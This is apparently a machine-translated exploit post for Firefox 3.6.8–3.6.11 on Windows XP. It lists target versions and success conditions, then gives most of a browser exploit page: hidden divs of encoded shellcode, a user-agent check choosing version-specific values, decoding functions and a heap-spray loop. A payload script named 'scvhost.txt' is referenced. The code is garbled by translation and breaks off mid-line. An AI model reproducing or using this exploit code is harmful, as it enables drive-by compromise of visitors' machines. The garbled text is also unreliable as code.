Firefox version 3.6.8, and 11

1. program name: ff3610
2. vulnerability-targeted software version

System Platform: windows xp sp2, sp3
Software Platform: firefox version 3.6.8, 9, 10, 11
This vulnerability may consume a large amount of memory on machines with a memory of less than or equal to 1 GB. firefox prompts you to continue running the script. After you click continue to run the script, the running time is about 1 minute, the possibility of success is not high. 2 GB memory and above run fast.
Iii. Vulnerability repair methods
You Can Update Firefox, but it will be effective if some machines have not been shut down for a long time! A lot of students have done it, and the vulnerabilities have been supplemented, so they can be used for research and research.

EXP:

<Body>
<Div style = "visibility: hidden; width: 0px; height: 0px">
<Div id = sun8> resize

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

</Div>
<Div id = sun9> resize

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

0d78u5500u1001u57A8u0d78ud761u1004 </div>
<Div id = sun10> resize

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Actions </div>
<Div id = sun11> resize

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

500u1007u11a1u1000u57A8u0d78u827fu1000u57A8u0d78ucda3u1000 </div>
<Div id = suv> renew

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

Bytes

735cu7663u6f68u7473u652eu6578u0022uffffuffffuffffffff </div>
</Div>
<Body>
<Script src?scvhost.txt> </script>
<Script type = "text/javascript">
Function check (){
Var temp = "";
Var user = navigator. userAgent. toLowerCase ();
Var a = user. indexOf ("windows nt 6.1 ");
Var B = user. indexOf ("windows nt 6.0 ");
Var c = user. indexOf ("firefox/3.6.8 ");
Var d = user. indexOf ("firefox/3.6.9 ");
Var e = user. indexOf ("firefox/3.6.10 ");
Var f = user. indexOf ("firefox/3.6.11 ");
If (a =-1 & B =-1 & c! =-1 & d =-1 & e =-1 & f =-1 ){
Temp = "8 ";
}
Else if (a =-1 & B =-1 & c =-1 & d! =-1 & e =-1 & f =-1 ){
Temp = "9 ";
}
Else if (a =-1 & B =-1 & c =-1 & d =-1 & e! =-1 & f =-1 ){
Temp = "10 ";
}
Else if (a =-1 & B =-1 & c =-1 & d =-1 & e =-1 & f! =-1 ){
Temp = "11 ";
}
Else {
Return temp = "0 ";
}
Return temp;

}
Function de (su ){
Var I; var sun = "";
For (I = 0; I <su. length; I ++ ){
Sun + = String. fromCharCode (parseInt (su [I], 16 ));
}
Return unescape (sun );
}
Function code (beastk ){
Var nop = "";
Var len = beastk. length;
For (I = 0; I <len ;){
Nop = nop + "m" + beastk. substring (I, I + 5 );
I = I + 5;
}
Nop = nop. split ("m"). toString ();
Var temp = new Array ();
For (j = 0; j <nop. length; j ++ ){
If (nop. charCodeAt (j). toString (16) = "2c "){
Temp. push ("25 ");
}
Else {
Temp. push (nop. charCodeAt (j). toString (16 ));
}
}
Return de (temp );
}
Function getatts (str ){
Var cobj = document. createElement (str );
Cobj. id = "testcase ";
Document. body. appendChild (cobj );
Var obj = document. getElementById ("testcase ");
Var atts = new Array ();
For (p in obj ){
If (typeof (obj [p]) = "string "){
Atts. push (p );
}
}
Document. body. removeChild (cobj );
Return atts;
}
Var ck = check ();
Var bk = "mp. ojsyex5 ";
Var array = new Array ();
Var ls = 0x100000-(bk. length * 2 + 0x01020 );
Var b1 = ""; // 111111111111111111111111111111
If (ck = "0 "){
Location. href = "about: blank ";
}
Else {

If (ck = "8 "){
B1 = code ("u0d0du0d0d ");
}
If (ck = "9 "){
B1 = code ("uef52u100a ");
}
If (ck = "10 "){
B1 = code ("ub8b7u1029 ");
}
If (ck = "11 "){
B1 = code ("u4bc8u1000 ");
}

Var B = b1;
While (B. length <(0x85750-0x1000)/2 ){
B + = b1
};

//// // 2222222222222222222
Var sun = "";
Var sun8 = document. getElementById ("sun8"). innerHTML;
Var sun9 = document. get